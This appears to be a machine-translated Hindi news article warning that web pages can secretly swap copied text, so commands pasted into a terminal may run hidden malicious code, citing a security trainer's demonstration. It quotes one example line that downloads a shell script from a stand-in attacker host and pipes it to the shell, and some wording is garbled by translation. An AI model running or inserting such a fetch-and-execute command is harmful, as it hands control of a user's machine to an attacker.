- हम सभी वास्तव में जोखिमों को जाने बिना इंटरनेट से दैनिक आधार पर कॉपी और पेस्ट करते हैं।
- एक सुरक्षा विशेषज्ञ ने ऐसा करते समय सभी को सबसे खराब स्थिति दिखाने के लिए समय लिया।
- इंटरनेट से प्राप्त आदेशों को अपने टर्मिनल में चिपकाना हैक होने का एक त्वरित तरीका है
- जिन आदेशों को आपने सोचा था कि आप अपने टर्मिनल में चिपका रहे हैं, वे वास्तव में दुर्भावनापूर्ण कोड हैं।
यह सच है कि हम ऐसे युग में रहते हैं जहां गति ही सब कुछ है, और तेजी से परिणाम प्राप्त करना ही मायने रखता है। हालांकि, कुछ लोग वास्तव में एक सेकंड के लिए रुकते हैं और नतीजों के बारे में सोचते हैं।
दैनिक आधार पर, लाखों प्रोग्रामर, व्यवस्थापक और सुरक्षा शोधकर्ता वेब पेजों से कमांड को सीधे अपने पीसी पर कंसोल में कॉपी और पेस्ट करने जैसे सरल कार्य कर रहे हैं।
हालाँकि कई लोग इसे दूसरा विचार भी नहीं देते हैं, लेकिन इसके निहितार्थ पहले से कहीं अधिक बड़े और अधिक खतरनाक हैं, खासकर यदि आप संवेदनशील या मूल्यवान डेटा संग्रहीत कर रहे हैं।
एक जाने-माने सुरक्षा विशेषज्ञ ने साझा करने के लिए समय निकाला वास्तव में क्या हो सकता है यदि आप वेब पेजों से सामग्री को कॉपी+पेस्ट करते हैं।
कॉपी+पेस्ट वास्तव में हैक होने का एक आसान तरीका है
गेब्रियल फ्रीडलैंडर, जो सुरक्षा जागरूकता प्रशिक्षण मंच वाइज़र के संस्थापक हैं, ने एक ऐसी योजना से पर्दा हटा दिया, जो वेब पेजों से कमांड को कॉपी और पेस्ट करने से पहले आपको दो बार सोचने पर मजबूर कर देगी।
इंटरनेट से कंटेंट को कॉपी और पेस्ट करना आजकल इतना आम हो गया है कि कोई इसके बारे में सोचने तक नहीं देता।
हालांकि, फ्रीडलैंडर ने चेतावनी दी है कि कुछ वेब पेज पहले की तुलना में अधिक धोखेबाज हैं, और जो आपको लगता है कि आपने उससे कॉपी किया है, वह वास्तव में आपके द्वारा किए गए कार्यों से बहुत अलग है।
और इस सब के बारे में सबसे बुरी बात यह है कि, आवश्यक ज्ञान या मार्गदर्शन के बिना, पीड़ितों को केवल पाठ चिपकाने के बाद ही अपनी गलती का एहसास होता है, जिस बिंदु पर पहले ही बहुत देर हो चुकी होती है।
सुरक्षा विश्लेषक ने अपने ब्लॉग पाठकों के लिए एक छोटा परीक्षण भी तैयार किया, ताकि लोग वास्तव में समझ सकें कि साइबर अपराधियों के लिए अनिच्छा से आपके लिए दरवाजा खोलना कितना आसान है।
उन्होंने एक आदेश प्रदान किया जिसे कॉपी किया जाना है, लेकिन संबंधित सच्चाई केवल तभी सामने आती है जब आप टेक्स्ट पेस्ट करते हैं और देखते हैं कि आपने वास्तव में अपने सेटअप में क्या पेश किया था।
ऊपर स्क्रीनशॉट में दिखाए गए कमांड को कॉपी करने के बाद, इसे पेस्ट करने का परिणाम आपको चौंका देगा, क्योंकि यह आपके द्वारा सोचा गया कि आप डुप्लिकेट कर रहे थे, उससे बहुत दूर है।
कर्ल http://attacker-domain: 8000/shell.sh | श्रीआपके क्लिपबोर्ड पर मौजूद पूरी तरह से अलग कमांड के अलावा, न्यूलाइन (या रिटर्न) कैरेक्टर at इसके अंत का मतलब है कि उपरोक्त उदाहरण जैसे ही इसे सीधे लिनक्स में चिपकाया जाएगा, निष्पादित होगा टर्मिनल।
इसलिए बेहतर होगा कि आप इस बारे में अधिक जागरूक रहें कि वास्तव में क्या होता है और इसे एक गंभीर सुरक्षा खतरे के रूप में देखें। हम यह नहीं कह रहे हैं कि सभी वेबसाइटें दुर्भावनापूर्ण सामग्री को छुपाती हैं, लेकिन इसे ध्यान में रखना आवश्यक है।
क्या आपको कभी अपने टर्मिनल में डोडी कमांड चिपकाने से हैक किया गया है? नीचे दिए गए टिप्पणी अनुभाग में अपना अनुभव हमारे साथ साझा करें।
